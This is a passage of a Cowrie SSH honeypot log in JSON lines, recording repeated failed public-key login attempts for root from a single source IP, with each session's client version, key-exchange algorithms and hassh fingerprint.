sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.082317Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.167996Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.168617Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.212303Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.212940Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.257337Z","src_ip":"212.227.125.160","session":"9684eb93d909"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42818,"dst_ip":"1.2.3.4","dst_port":22,"session":"28baaf04799d","protocol":"ssh","message":"New connection: 212.227.125.160:42818 (1.2.3.4:22) [session: 28baaf04799d]","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.312894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.313879Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.353987Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.436800Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.437492Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.478962Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.479585Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.522167Z","src_ip":"212.227.125.160","session":"28baaf04799d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42832,"dst_ip":"1.2.3.4","dst_port":22,"session":"5127e9cd379f","protocol":"ssh","message":"New connection: 212.227.125.160:42832 (1.2.3.4:22) [session: 5127e9cd379f]","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.560232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.561040Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.599749Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.679023Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.679628Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.719347Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2e:74:08:9b:32:69:af:2e:12:ef:7c:03:d4:e1:3e:9c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCud5bccjEu8YTi4xchj62lhuitTn3wbLDyrHCvBFleUM8tnWbsRzI1rPcFtiRGB40gsCiN0v8QHCh66HLX+pY/eq/Qdhe5b+DYMaeDVDfM+SbI6UxZ0Af0U8PTWBWoamx/ziNqfJgNFFQm9zGDkF5xwhjlQBJbtb7vmtsMc2haVeugipytuiKYWNp/mRF3T9GizsWZ2loACwrnE+5Am6aZgOOP5D8sHbkjuPh7Vji2U6JssnAp4uOA5vEeLdj8skL5lX6cRKwYhBefGPFDLcsv9rFyM2909lIgnU4EsOFCcKnUwhe8UI/cgQHT01ldCTvIYEgULtAWOquu6Ac7I5U/XS35DIv7XfJKROXh7XBBqEQBWAODlkvJO1nP8nEx1eG2uQZWwOXApB0ShQ9lyZhPyk4ynegRgt/32+g5OMcHMs2QmdSTkLRp+VTpjp+zBAminix9UaPuHfA0PuLAALLY68nCleXpfF/DCEKSQqtWG69foRcHjmwfmWlGchLOkx5m0nQ6IjRp4fTX6tCDD4hjeUNnbyj9KOviOlGBX3ijxcFH0hEZu0WMvkIY9doSbYKFfTHJ7ufRSXMGw9ljvJkeVwNKUTliG2adesftpJhqH+6Mzr3cvINeHn5N9YJWqi1tVRLeTHss1BN/pnjMraGnqBZPNDSQJgayVf+jynOQ0Q==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.720787Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.760569Z","src_ip":"212.227.125.160","session":"5127e9cd379f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42846,"dst_ip":"1.2.3.4","dst_port":22,"session":"357ab98529f3","protocol":"ssh","message":"New connection: 212.227.125.160:42846 (1.2.3.4:22) [session: 357ab98529f3]","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.799607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.800405Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.840559Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.922062Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.922753Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.964655Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:38.965299Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.005983Z","src_ip":"212.227.125.160","session":"357ab98529f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42858,"dst_ip":"1.2.3.4","dst_port":22,"session":"3285228211df","protocol":"ssh","message":"New connection: 212.227.125.160:42858 (1.2.3.4:22) [session: 3285228211df]","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.047783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:39.048408Z","src_ip":"212.227.125.160","session":"3285228211df"}
